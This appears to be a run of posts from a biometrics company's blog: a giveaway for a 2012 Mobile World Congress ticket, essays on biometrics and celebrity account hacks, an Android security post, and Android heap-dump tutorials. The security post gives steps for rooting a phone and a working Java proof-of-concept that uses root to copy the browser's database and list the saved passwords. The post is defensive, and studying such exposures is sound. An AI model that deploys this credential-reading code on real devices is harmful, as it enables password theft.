The number of the ONCE draw have finished in 903. the higher closer number is 923, so the winner (without confirmation) of the draw is María Fernanda Jaramillo Polo. Congratulations! Thanks to everybody for participating and we hope to hearing from you soon. See you!

*** LIST OF PARTICIPANTS ***

In Mobbeel we know that you love everything related to smartphones, that’s why we want to give you the opportunity to see the cutting edge advances of the mobile world. We have one ‘Exhibition Visitor Pass’ ticket to give away valued in 699€ for the Mobile World Congress 2012 which takes place in Barcelona from February 27th to March 1st. Barcelona will be the capital of the mobile world during the event, the world`s largest mobile manufacters will all be exhibiting their latest developments. Travel and accommodation are not included.

*** LIST OF PARTICIPANTS ***

What do I have to do to participate?

To get your hands on the ticket, you only have to follow one of these options, but if you complete both of them you will have more possibilities to win.

Don`t worry if you were already following us in both social networks, because for being our lawfully follower, using the hashtag #MobbeelWMC o leaving a comment on the Facebook plugin you will enter into the draw.

– Click ‘Like’ button on our Facebook fan page (www.facebook.com/mobbeel) and leave a comment on the following Facebook plugin

– Follow us on Twitter (@mobbeel) and use the Hashtag #MobbeelMWC

Follow @Mobbeel

Tweet #MobbeelMWC

When is the deadline to participate?

The deadline to participate is February 10th 2012 at 23:59 (GMT+1). On February 11th the draw will be conducted and the winner of the ticket for the MWC 2012 will be announced.

Prize Draw Rules

– On February 11th at 10.00 (GMT +1), Mobbeel will publish on this blog a list with all participants and the number assigned to them.
– The draw will use the last three digits of the ONCE coupon from February 11th which may be consulted from here. The participant whose number matches those last three digits will be the winner, provided it meets the other requirements and conditions of the draw.
– If the digits of the ONCE coupon don’t match any participant’s number, the winner will be chosen as the participant with the higher number closer to the coupon digits.
– Once selected the winner, it will be checked that he/she complies the conditions of the draw, ie if the Facebook fan page ‘Like’ button has been clicked and a comment in the Facebook plugin has been made, or if he/she is a Mobbeel follower on Twitter (@mobbeel) and has used the hashtag #MobbeelMWC. In case of not meeting these requirements or if the winner declines the prize, we will continue with the next consecutive number in ascending order until finding a winner.
– The prize is an “Exhibition Visitor Pass” ticket valued at 699€ for the Mobile World Congress 2012 valid during the entire week of the event, see prices.
– Mobbeel reserves the right to remove of the draw for those players using fake accounts to try increasing their chances of winning.
– Mobbeel reserves the right to cancel, suspend or amend these rules as well as the organization and / or administration of this promotion, under cause.

“Science is built upon approaches that gradually come closer to the truth.” Isaac Asimov.

In 1879, Alphonse Berthillon, head of the French police photography department, suggested that people could be identified by precise physical measurements.
His system was based on measuring certain lengths and widths of the head and the body, as well as recording individual marks like tattoos or scars.
This system was quickly adopted widely by American and British police forces until system failures began to appear, the main problems with measuring changes. From that time onwards, western police forces started using fingerprinting to identify criminals.
In recent years, biometrics has grown from just using a fingerprint, to employing many different identification methods that fall into two broad categories: physiology and behavior.

Physiological biometrics is based on measuring the individual’s unique physical characteristics, such as fingerprint details, patterns of retina veins, iris characteristics or the size and shape of the hand.

Behavioral biometrics identifies unique learning characteristics, such as signature, keystrokes or voice recognition, which compares frequencies and vocal patterns to identify the speaker.


ID cards, PINs and passwords do not actually identify a person, as the owner may transfer any of these identifications to another person. Only biometric readers identify people by unique and unchanging characteristics.
If someone steals or guesses your password, the thief could access your information without difficulty, but to impersonate you using your biometric profile, although not impossible, is much harder.
We can prove the low reliability of traditional identification methods through iSpy. This is a software package that captures what is written on the cellphone at a distance of 3 to 60 meters. The goal of North Carolina University researchers who have developed iSpy was to check whether the use of cellphones in public places could be a risk. The software succeeds in 90% of the cases identifying which keys the user is pressing.

To solve this security issue, biometrics industry continues innovating and researching for new biometric methods to identify people such as body odor, ear structure or brain electromagnetic signals.
One of the most advanced techniques with great potential due to its simplicity is vascular biometrics. This technique studies the thickness and distance between the veins that lie under our skin. As this is an internal standard, it leaves no trace, providing a high level of security. We can have this technology in our cellphones sooner than we thought.

Unlike laptops, which we sometimes leave at home or in the office, mobiles are always with us wherever we stay, wherever we go. This fact awakens the interest of thieves, who are attracted by device price-size relationship, but if we think carefully, the information it contains can be worth much more. A survey performed by GetSafeOnline.org says that smartphone ‘malware’ has increased by 800% in just 4 months.
For this reason, biometrics will pass in a not-so-distant future from being ‘an interesting concept’ to be ‘a need’ in all smartphones.

ABI Research suggests in a recent survey that people are feeling more comfortable using biometric security, which could result in a $3 billion spending increase in biometrics over the next five years. Supporting this prediction, we find cases such as India, which will pass from recognizing their people through their membership to a group, according to their caste, tribe or religion, to identifying all its citizens trough iris recognition. On the other hand, Isabelle Moeller of the Biometrics Institute, considers that ‘Public acceptance of biometrics has been slow to grow, and will continue to be an issue until issues of privacy and security of data have been brought up to a level acceptable by the majority of people’.

Another survey done by Goode Intelligence about mobile biometrics foresees an increase from 4 million mobile biometric users that exist in 2011 to 39 million in 2015.
The survey also details how biometrics will work on cellphones, focusing on device protection, e-commerce security, NFC security and replacement of PINs and passwords. According to the survey, fingerprint sensors and voice recognition technology will be the first to appear.

Jose Luis Huertas, CEO at Mobbeel, a company based on the creation of biometric solutions for smartphones, gives us his opinion about these facts. ‘Every day we perform more transactions with our smartphones and we store more and more both personal and professional private information. Until now, we could only protect that information with a large amount of forgettable passwords. Furthermore, it is difficult to type long and complex passwords with a tiny smartphone keyboard, so we finally preferred to use passwords which are easy to remember and to type in exchange for losing security. Biometrics is the solution to combine security and comfort and soon all of us will have a high level of security without having to remember anything, anytime, anywhere’.

The latest analysis performed by ZoneAlarm warns us of some shocking facts. 79 % of internet users use unsecure passwords and 16 % create passwords from people’s first names. This report says that the most used password is ’123456′, closely followed by ’12345′, ’123456789′ and irrespective of which language you use, the next most common password that was identified was ‘password’ ( 密码 in chinese, пАРОЛЬ in russian).I´m sure that you have often thought : “Why should I complicate my life thinking up a safe password, that I will never be able to remember, if no one actually is interested in my account”.

This same fake feeling of safeness is starting to affect a lot of celebrities that have been suffering leaks of private information from their accounts.

The first real case of ‘cyber-attack’ against a ‘celebrity’ was in 2005, when hackers obtained access to Paris Hilton’s cell phone and distributed private and compromising photos of her. Mikko Hypponen, chief of investigation of F-Secure, an IT security company, said that hackers found the answer to her not-so-secret security question, which was ‘Tinkerbell’, the name of her Chihuahua.

In December 2010, two young amateur hackers get access to the email accounts and photos of more than 50 ‘celebrities’, including Lady Gaga, Ke$ha or Justin Timberlake. In this case, they only used simple ‘Trojans’ and a lot of pacience to break into their accounts.

In March 2011, Vanessa Hudgens, from ‘High School Musical’, reported that some photos had been stolen from her Gmail account.

In April 2011, Wayne Rooney announced on Twitter that his cell phone had been hacked. He reported the incident to Scotland Yard and the resulting investigation confirmed that the newspaper ‘News of the World’ had intercepted his private conversations, which led to them publishing damaging details about the English striker’s infidelity with a prostitute.

In August 2011, the rapper Kreayshawn posted on her blog that her Twitter account had been hacked when some photos of her naked appeared.

In September 2011, Scarlett Johansson and Mila Kunis were victims of phone hacking.
This Wednesday, Christopher Chaney was arrested by Los Angeles FBI thanks to the ‘Hackerazzi’ operation. The 35-year-old suspect lives in Florida and had illegal access to the accounts of at least 50 famous people, among which Christina Aguilera, Scarlett Johansson, Mila Kunis, Simone Harouche and Renee Olstead among others.

one thing is sure, this kind of hacking against celebrities is not going to disappear. ‘This is on the rise’, said Hypponen. ‘When people see what happened with Scarlett Johansson, you can bet that we are going to find more hackers outside that are trying to do the same with other beautiful actresses’.

This statement of Hypponen leads us to the question. ‘How long before this trend extends beyond famous people?’

Here are a few tips you can follow to safeguard your accounts:

Use a good password manager to keep all your passwords safe.

Use a password generator, it doesn´t matter if you don´t remember your password because the password manager will remember it for you.

Keep all your private information in a real safe place, using advanced security techniques such as Biometrics (iris, signature recognition).

If all of the above doesn´t convince you, you can always delete all your private information. Although that may be a bit complicated due to the amount of sensitive documents that we save on our computer’s and cell phone’s these days.

If, like us, you are convinced that your private information should remain private, you can download BioWallet Signature from the Android Market and save all your documents and passwords securely thanks to signature recognition technology. And if you complement it with Biowallet2Browser, you could send your saved accounts from BioWallet to your browser and login from your computer without fear of being hacked.

One final suggestion, don’t take naked pictures of yourself on your phone!

One of the cornerstones on which the Android security model is based is that an user application cannot read or write the files of other applications. To that end, Android uses the Linux permission model and it assigns each application its own user id. This way, it avoids (in theory) that our application’s data can be accessed by third party applications or that we can access data from them.

This model works perfectly as long as there is not a “superuser” present on the phone with access to the whole file system (the famous “root”). By default, most of the Android phones that are released to the market don’t have this root user (with some exceptions like the GeeksPhone One), but we have all seen that some methods have been developed to gain root access to each and every of these phones. Lately, it has become such an easy task that, in many phones, installing an application and clicking a button is all you need to get it.

Most of the times, users gain root access to their devices to be able to install customized ROMs, use applications that need access to protected areas of the system, etc. but they don’t realize the security risks this involves.

One of the latest security risks that have been known is that, several applications, including the email client and the browser, store the user passwords without any kind of encryption. They do it because they are trusting the default Android security that ensures no other applications will be able to read or write these files. However, as we have seen before, gaining root access in most of the current devices is so easy that this security measure is clearly insufficient.

Some people could be thinking that this is just a simple oversight or lazyness of these applications’ programmers and that it can be easily solved just encrypting that information, but it is not so easy. In fact, is just a balance between convenience and security. To protect these passwords we would need an additional password to encrypt/decrypt them. And… how is this password stored? In plain text? Encrypted? If we encrypt it we would need again a new password but… what are we going to do with the password that encrypt the password that encrypt the passwords? At the end you need that the user enters something that cannot be stored on the system and that only he/she knows (or a biometric feature like the ones that BioWallet requires).

Several methods to exploit this security breach have been published on different blogs. Most of them require a rooted phone, connecting the phone to a computer and activating the debug mode, extracting the database from the phone and opening it with specific tools, etc. This causes a false security sensation on the less experimented users, because they think:

1. My phone is not rooted and so it is safe.
2. Mi phone is rooted, but to find out my passwords somebody should stole it and the attacker should be almost an expert hacker.

Actually, the security risk is greater than what most users think, because:

1. If your phone is not rooted but it is lost or stolen, gaining root access is a matter of minutes even for a non-expert person.
2. If your phone is already rooted it is not neccessary that somebody steal it and connect it to a computer. Every application you install could be a malicious one, access your passwords and send them to anywhere and you wouldn’t notice it.

To prove that this is a real security risk, now we are going to show how to gain root access to a mobile phone in a matter of seconds and we are going to present a sample application that, in a few lines of code, is able to access the browser stored passwords and display them on the screen.

How to get root access on the Motorola Droid

We can suppose somebody has got my Motorola Droid which I consider very secure because I never have activated the root access. The attacker only has to:

1. Download and install the UniversalAndroot directly from the phone (there are a lot more, this is just one of the most known ones).
2. Open the UniversalAndroot and click the button “Go Root”.



3. That’s all! The user now is root on our phone and could have access to all the passwords that have been stored in plain text.

PasswordsExploit

In the event that we already have rooted our own phone, the risk is even higher, because a malicious app might request superuser permission with a different pretext and, if we allow it, the application could access the stored passwords and send them everywhere without our consent. To show that it is very easy to create such application and you don’t need to be a security expert, we are presenting a sample that, in a few lines is able to access your passwords and display them on the screen (a real malicious application of course wouldn’t display them but it would silently send them outside the phone).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

package com.mobbeel.passwordsexploit;
 
import java.io.DataOutputStream;
import java.io.IOException;
 
import android.app.ListActivity;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.os.Bundle;
import android.widget.ListAdapter;
import android.widget.SimpleCursorAdapter;
import android.widget.Toast;
 
public class PasswordsExploitActivity extends ListActivity {
 
	@Override
	public void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
 
		try {
			//Get root access
			Process process = Runtime.getRuntime().exec("su");
			DataOutputStream os = new DataOutputStream(process.getOutputStream());
			//copy the browser database to a readable directory
			os.writeBytes("cp /data/data/com.android.browser/databases/webview.db /tmp \n");
			//change the permissions to be readable by everybody
			os.writeBytes("chmod 666 /tmp/webview.db \n");
			os.writeBytes("exit\n");
			os.flush();
			process.waitFor();
 
			//end of root commands. Now just open the database and query as usual
			SQLiteDatabase db = SQLiteDatabase.openDatabase("/tmp/webview.db", null, SQLiteDatabase.OPEN_READONLY);
			//SELECT * FROM password;
			Cursor c = db.query("password", null, null,	null, null, null, null);
			startManagingCursor(c);
 
			//display Usernames and Passwords on a list
			ListAdapter adapter = new SimpleCursorAdapter(this,
					android.R.layout.two_line_list_item, c,
					new String[] { "username", "password" },
					new int[] { android.R.id.text1, android.R.id.text2 });
			setListAdapter(adapter);
 
 
		} catch (IOException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		} catch (InterruptedException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		}
 
	}
}

When we execute this application, if we have already rooted our phone, it will request a permission to execute commands as a superuser. We never should give this permission to applications unless we absolutely trust them.

If we grant this permission, the application reads the usernames/passwords stored by the browser and display them on a list.

As a conclusion, we could give some recommendations to ensure your passwords are safe:

1. Don’t root your phone unless you are an experimented user and you know perfectly the security risks you are assuming.
2. In the event you have already rooted your phone, don’t allow supeuser permission to third party applications that might request it unless you absolutely trust them.
3. Don’t use the option to remember passwords in the browser or any other application that doesn’t protect them with another password (or a biometric feature like BioWallet). You should follow this advice not only for the Android browser, but also for your computer browsers, instant messaging clients, …. As a rule of thumb, every application that is able to access stored password without asking for your identification is because it’s not storing them on a secure way.
4. Use a reliable password manager to store your sensitive information.

A couple of days ago we shown you how to get a memory dump of your Android application and open it in Eclipse MAT. That procedure was valid for versions up to 1.1, but it has slightly changed for the new version 1.5 (a.k.a. cupcake).

1. First step doesn’t change, we have to make sure /data/misc is writable:

   1 2	#su #chmod 777 /data/misc

2. Take note of your application process number using the Eclipse DDMS perspective or with the command ‘ps’ within the emulator/phone shell.
3. Send a SIGUSR1 signal to the process with the command:

   1	kill -10 <pid number>

4. In 1.5, a new API has been introduced to generate a dump programmatically, the static method dumpHprofData(String fileName) of the Debug class. Example:

   1	Debug.dumpHprofData("myAppDump.hprof");

5. In 1.5 only one dump file will be generated (with the pattern heap-dump-tm-pid.hprof), so you no longer need to concatenate it with anything.
6. You still need to pull it from the emulator/phone to your computer and “deandroidize” it with the hprof-conv tool. The good news is this tool is now bundled with the SDK and you don’t need to download or compile it anymore.

   1 2	adb pull /data/misc/heap-dump-tm<timestamp>-pid<myPid>.hprof . hprof-conv heap-dump-tm<timestamp>-pid<myPid>.hprof myDump.hprof

7. Now you can open it with your preferred memory analysis tool (ours is MAT!).

Note: This procedure is valid for SDK versions up to 1.1. For instructions about how to do it in Android 1.5 take a look at this post: Analyze an Android 1.5 memory dump.

In this post we will show you how to get a memory dump of your running Android application, convert it to a standard format supported by the conventional tools and open it with Eclipse MAT (Memory Analyzer Tool) to detect memory leaks.

The memory dump is going to be generated on the /data/misc directory so the first step is modifying its permissions to make sure it is writable.

1
2
3

adb shell
#su
#chmod 777 /data/misc

Note: You can do this on the emulator or if you are working with an Android Developer Phone, but you cannot do it if you are working with a T-Mobile G1 (unless you are root, but that’s for another post). The ‘su’ command is only needed if you are working with an ADP1 because the adb daemon runs as a regular user.

Next, we should run our application and take note of its process number. It can be found using the DDMS view in Eclipse

or if you are a command line guy you can use this to list the currently running processes:

1

#ps

We will use this number to send a SIGUSR1 signal to the process. Currently the Dalvik VM will generate a memory dump in response to two signals, SIGQUIT and SIGUSR1. If you send it a SIGQUIT it will dump the stacks from all running threads; if you send it a SIGUSR1 it will dump the heap profiling data. The most usual way to send the signal to the process is with the kill command:

1

kill -10 <pid number>

but you can also send it programmatically from inside the application with this code:

1

android.os.Process.sendSignal(android.os.Process.myPid(), android.os.Process.SIGNAL_USR1);

On a “regular” JVM you could generate a dump in the very moment the first OOM occurs (starting it with the -XX:+HeapDumpOnOutOfMemoryError option), which is very useful, but that feature is not available in Dalvik yet (however, it is on the “to do list” of the Android team).

If everything works OK, you should see something like this on the log:

04-28 13:53:32.418: INFO/dalvikvm(22609): threadid=7: reacting to signal 10
04-28 13:53:32.418: INFO/dalvikvm(22609): SIGUSR1 forcing GC and HPROF dump
04-28 13:53:32.418: INFO/dalvikvm(22609): hprof: dumping VM heap to “/data/misc/heap-dump-tm1240926812-pid22609.hprof“.
04-28 13:53:35.682: INFO/dalvikvm(22609): hprof: dumping heap strings to “/data/misc/heap-dump-tm1240926812-pid22609.hprof-head“.

Now we can pull the generated files to the computer:

1
2

adb pull /data/misc/heap-dump-tm1240926812-pid22609.hprof-head .
adb pull /data/misc/heap-dump-tm1240926812-pid22609.hprof .

And we have to join them in a single file. If you are in a Windows system you could use the ‘type’ command (or ‘cat’ in a Linux system.):

1
2

C:\...>type heap-dump-tm1240926812-pid22609.hprof-head > android-dump.hprof
C:\...>type heap-dump-tm1240926812-pid22609.hprof >> android-dump.hprof

The generated dump contains specific information related with the Dalvik VM that are not part of the standard hprof format so the standard tools won’t be able to open it. Luckily, the Android team has released a tool to trim the Dalvik specific records and convert the dump to a standard format. You can find the source code here.

1

C:\...>hprof-conv android-dump.hprof standard-dump.hprof

Finally you can open it with your preferred analysis tool (JHat, JProfiler, MAT, etc.). In this post and followings we will be using MAT.

That’s all for now! We will publish more information soon about how to use MAT to detect and solve memory leaks in your application.